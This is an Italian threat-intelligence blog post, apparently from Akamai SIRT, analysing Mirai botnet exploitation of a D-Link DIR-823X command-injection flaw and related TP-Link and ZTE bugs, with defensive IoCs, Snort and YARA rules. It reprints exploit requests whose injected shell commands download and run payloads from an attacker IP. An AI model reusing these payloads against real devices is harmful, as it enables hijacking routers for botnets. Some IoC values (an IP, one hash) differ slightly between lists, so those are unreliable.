Concetti chiave
Il SIRT (Security Intelligence and Response Team) di Akamai ha identificato uno sfruttamento attivo della vulnerabilità CVE-2025-29635 per sferrare attacchi CMDi (Command injection) contro i router della serie D-Link DIR-823X. Sebbene questi dispositivi siano stati ritirati dal mercato nel 2025, i criminali informatici stanno sfruttando questa vulnerabilità per diffondere alcune varianti della botnet Mirai.
Il SIRT ha identificato questa attività nella nostra rete globale di honeypot per la prima volta a marzo 2026. Si tratta del primo episodio di sfruttamento attivo di queste vulnerabilità dalla loro divulgazione iniziale a marzo 2025.
In questo blog, abbiamo incluso un elenco di indicatori di compromissione (IoC) per aiutarti a difendervi da questa minaccia.
Individuazione di alcuni tentativi di sfruttamento attivo dei dispositivi D-Link
All'inizio di marzo 2026, il team SIRT di Akamai ha individuato alcuni tentativi di sfruttamento attivo della vulnerabilità CVE-2025-29635 agli attacchi CMDi (Command injection) contro i dispositivi D-Link all'interno della nostra rete globale di honeypot. Questa vulnerabilità, individuata nei router della serie D-Link DIR-823X all'interno delle versioni firmware 240126 e 24082, consente a un criminale autorizzato di eseguire comandi arbitrari su dispositivi remoti inviando una richiesta POST all'endpoint /goform/set_prohibiting tramite la funzione corrispondente, che può innescare l'esecuzione di comandi remoti.
Analisi della vulnerabilità del firmware CVE-2025-29635
Lo sfruttamento della vulnerabilità CVE-2025-29635, divulgata pubblicamente alla fine di marzo 2025, consente di sferrare attacchi CMDi (Command injection) contro i router della serie D-Link DIR-823X all'interno delle versioni firmware 240126 e 24082. A partire da settembre 2025, questi router saranno considerati dispositivi obsoleti, come comunicato dal relativo vendor.
Wang Jinshuai e Zhao Jiangting, due ricercatori che si occupano di sicurezza, hanno individuato e segnalato la vulnerabilità, analizzando in dettaglio la funzione sub_42232C presente nel file binario mostrato nella Figura 1. I due ricercatori hanno scoperto che il valore restituito dalla funzione macaddr viene copiato nella variabile di comando tramite la funzione snprintf e, successivamente, viene eseguita la funzione system. Manipolando in modo dannoso il valore della funzione macaddr, un criminale potrebbe eseguire comandi remoti inviando una richiesta POST all'endpoint /goform/set_prohibiting.
Figura 1. La vulnerabilità del firmware CVE-2025-29635
I ricercatori hanno condiviso su GitHub una PoC (Proof-of-Concept) pubblica relativa a un exploit, collegata alla divulgazione della CVE, che, tuttavia, è stata successivamente rimossa (Figura 2). Al momento della stesura di questo blog, la vulnerabilità non era ancora presente nel catalogo KEV (Known Exploited Vulnerabilities) della CISA.
POST /goform/set_prohibiting HTTP/1.1
Host: 192.168.122.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Origin: http://192.168.122.130
Connection: close
Referer: http://192.168.122.130/login.html
Cookie: sessionid=00000000000000000000000000000000; token=00000000000000000000000000000000
macaddr=||touch%20/set_prohibiting||&token=00000000000000000000000000000000I dati raccolti tramite honeypot rivelano l'esistenza di campagne di botnet attive.
All'inizio di marzo 2026, il team SIRT di Akamai ha individuato alcuni tentativi di sfruttamento attivo della vulnerabilità CVE-2025-29635 all'interno della nostra rete globale di honeypot (Figura 3).
POST /goform/set_prohibiting HTTP/1.1
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
parameter=;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget http://88.214.20[.]14/dlink.sh -O dlink.sh; curl -o dlink.sh http://88.214.20[.]14/dlink.sh; wget http://88.214.20[.]14/dlink.sh; chmod 777 dlink.sh; sh dlink.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh;Gran parte della richiesta mostrata nella Figura 3 corrisponde all'exploit PoC illustrato nella Figura 2, ma ci sono alcune differenze significative. In primo luogo, questo tentativo non include alcuni header fondamentali, come il Referer e l'Accept-Language. Non fornisce alcun tipo di autenticazione, né tramite token né tramite ID di sessione, sia nell'intestazione che nel corpo della richiesta.
Tuttavia, sembra che il firmware non riesca a verificare la presenza o la validità di questi campi e valori. A causa di questa vulnerabilità, il router estrae il valore presente nel buffer dei comandi direttamente dal corpo della richiesta, senza verificare da quale campo del modulo provenga. Se il parser considera ogni coppia chiave-valore nel corpo del messaggio come un potenziale candidato per il campo macaddr, o se semplicemente copia l'intero contenuto nel buffer, un criminale potrebbe fornire un payload dannoso utilizzando un nome arbitrario, come ad esempio un parametro.
Quindi, sebbene questo tentativo di sfruttamento presenti alcune differenze significative rispetto all'exploit PoC, colpisce la stessa porzione vulnerabile del codice e attiva la stessa chiamata di sistema, che esegue la sequenza di comandi shell fornita.
Analisi tecnica della variante Mirai
Lo script shell caricato durante il tentativo di attacco è molto semplice e diretto: scarica ed esegue un payload di malware Mirai, chiamato "tuxnokill", che supporta diverse architetture utilizzando lo stesso indirizzo IP del downloader: 88.214.20[.]14. Il malware in questione sembra essere una variante tipica del malware Mirai, che utilizza la codifica XOR con una chiave di decrittografia pari a 0x30. Il malware contiene anche la stringa di esecuzione della console "segmentation fault (core dumped)" integrata nel codice sorgente, che è tipica dei payload Mirai, oltre a un indirizzo IP del downloader anch'esso integrato nel codice sorgente. In base alle connessioni sandbox, l'indirizzo IP del server C2 (Command and Control) è 64.89.161[.]130, con porta 44300.
A differenza di altri criminali che stanno iniziando a utilizzare payload basati sul vibe coding, riteniamo che l'autore di questo attacco abbia sviluppato il proprio payload in modo tradizionale, come evidenziato dalla stringa "AI.NEEDS.TO.DIE" presente nel suo malware e integrata nel codice sorgente. I comandi dell'attacco rilevati nel malware sono piuttosto comuni (Figura 4).
TCP STOMP
TCP ACK
TCP SYN
STD
GRE ETH
UDP DNS
UDP VSE
UDP PLAIN
UDP GENERIC
RAW
XMAS
HTTP NULLSfruttamento osservato delle vulnerabilità nei dispositivi TP-Link e ZTE
Oltre a sfruttare la vulnerabilità CVE-2025-29635, abbiamo osservato che questo criminale ha tentato di sfruttare altre due vulnerabilità all'interno della nostra rete di honeypot: la CVE-2023-1389 (Figura 5) per colpire i dispositivi TP-Link Archer AX21 e un exploit per l'esecuzione di codice remoto (RCE) contro un router ZTE ZXV10 H108L (Figura 6).
POST /cgi-bin/luci/;stok=/local?form=country HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id>curl -o tplinkwan.sh http://88.214.20[.]14/tplinkwan.sh; wget http://88.214.20[.]14/tplinkwan.sh; chmod 777 tplinkwan.sh; sh tplinkwan.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh)POST /manager_dev_ping_t HTTP/1.1
Host: honeypot_ip:8083
User-Agent: Go-http-client/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&Host=;$(cd /tmp;wget http://88.214.20[.]14/bins/tux.mips; chmod 777 tux.mips; ./tux.mips zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submitConclusione
Le campagne di malware Mirai continuano a rappresentare una grave minaccia per il settore perché gran parte del codice sorgente originale viene ancora riutilizzato da vari criminali informatici, esperti o meno. La facilità di accesso e i potenziali vantaggi economici sono alcuni dei fattori che possono spingere alcuni individui ad entrare nel mondo delle botnet e a diventare autori di attacchi informatici.
Sebbene questo criminale possa sembrare fermamente contrario all'intelligenza artificiale, molti altri criminali considerano l'AI uno strumento da sfruttare per scopi illeciti. Sia per sviluppare malware che per identificare nuove vulnerabilità da sfruttare, il potenziale dell'intelligenza artificiale è evidente, sia per i criminali che per gli addetti alla sicurezza.
Molti criminali informatici che operano nel settore delle botnet prendono spesso di mira vulnerabilità obsolete. Soprattutto quando esistono exploit PoC pubblici per queste vulnerabilità, i criminali possono facilmente integrarli nei loro vettori di attacco.
Purtroppo, molte organizzazioni in tutto il mondo configurano in modo errato i loro dispositivi, non applicano tempestivamente le patch di sicurezza o continuano ad utilizzare dispositivi vulnerabili ormai obsoleti, come nel caso dei router della serie D-Link 823X. Pertanto, consigliamo vivamente alle organizzazioni di controllare regolarmente le comunicazioni informative sulle vulnerabilità relative alla propria infrastruttura e di applicare patch, aggiornamenti e sistemi di sicurezza adeguati per garantire la propria sicurezza operativa.
Tieniti aggiornato con noi
Il SIRT di Akamai continuerà a monitorare e a segnalare minacce come queste per i clienti dell'azienda e per la più vasta comunità della sicurezza. Per aggiornamenti sulle ultime novità dell'Akamai Security Intelligence Group, puoi consultare la nostra pagina relativa ai lavori di ricerca e seguirci sui social media.
IOC
Abbiamo incluso un elenco di indicatori di compromissione (IoC), nonché di regole Snort e Yara, per aiutare i team addetti alla sicurezza.
Regole Snort per gli IP dannosi
alert ip any any -> [88.214.20.14, 64.89.161.130] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Regole Yara per i campioni di malware
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-03-27"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$string1 = "segmentation fault (core dumped)"
$string2 = “AI.NEEDS.TO.DIE”
$ip1 = "88.214.20.14"
$ip2 = "64.89.161.13"
$hash1 = "32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100"
$hash2 = "be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b"
$hash3 = "d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7"
$hash4 = "7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8"
$hash5 = "72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8"
condition:
(
$string1 or
$string2 or
$ip1 or
$ip2 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5
)
}Indirizzi IPv4 dannosi
88.214.20.14
64.89.161.130
Hash SHA256
2ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8
72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
Tag
